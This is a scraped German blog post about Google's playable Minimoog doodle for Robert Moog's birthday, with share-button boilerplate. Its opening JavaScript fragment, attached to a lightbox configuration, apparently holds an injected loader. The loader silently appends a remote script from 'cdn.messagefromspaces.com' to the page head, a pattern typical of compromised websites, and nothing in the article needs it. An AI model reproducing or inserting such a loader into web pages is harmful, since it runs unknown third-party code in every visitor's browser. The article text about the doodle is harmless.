, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Minimoog Doodle

weiterempfehlen

  • Facebook
  • Twitter
  • Delicious
  • LinkedIn
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS


Google ehrt den Musik-Pionier Robert Moog zu seinem Geburtstag mit einem funktionsfähigen Synthesizer auf der hauseigenen Suchseite. Den legendären Minimoog kann man gegenwärtig als Google-Doodle ausprobieren.
 
 
Die Funktionen sind in diesem Video in englischer Sprache anschaulich erklärt.


 
 
Das Doodle lässt sich über Tastatursteuerung auch live als Instrument spielen, wie das folgende Video demonstriert. In unserem Test funktionierten nur die weißen Klaviertasten mit den Ziffern 1 bis 0 auf dem Keyboard, bei US-English-Tastaturen sollen auch die Buchstaben der QWERTY-Reihe spielbar sein.
 
 
Eine Bild mit Beschreibung der Funktionen des Doodle finden Sie im offizielen Google-Blog.
 

 


Email
Print
WP Socializer Aakash Web